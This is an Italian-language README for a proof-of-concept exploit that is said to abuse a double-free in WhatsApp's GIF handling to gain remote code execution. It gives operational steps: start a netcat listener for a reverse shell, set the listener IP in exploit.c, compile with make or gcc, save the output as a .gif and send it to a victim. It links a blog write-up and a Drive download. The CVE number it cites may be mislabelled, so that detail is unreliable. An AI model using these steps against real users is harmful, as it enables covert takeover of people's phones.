
Proof-of-concept exploit per CVE-2020-11932, una vulnerabilità di doppia liberazione nell'elaborazione dei GIF di WhatsApp, che consente l'esecuzione di codice remota tramite un file .gif manipolato.
Bug di double-free nel PoC dell'exploit di WhatsApp.
#Nota: assicurati di impostare l'IP del listener in exploit.c per ottenere una shell.
nc -lvp 1337 o qualsiasi porta.
e poi compila.
make
oppure
gcc -o exploit egif_lib.c exploit.c
poi esegui ./exploit e salva il contenuto in .gif
e invia alla vittima.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing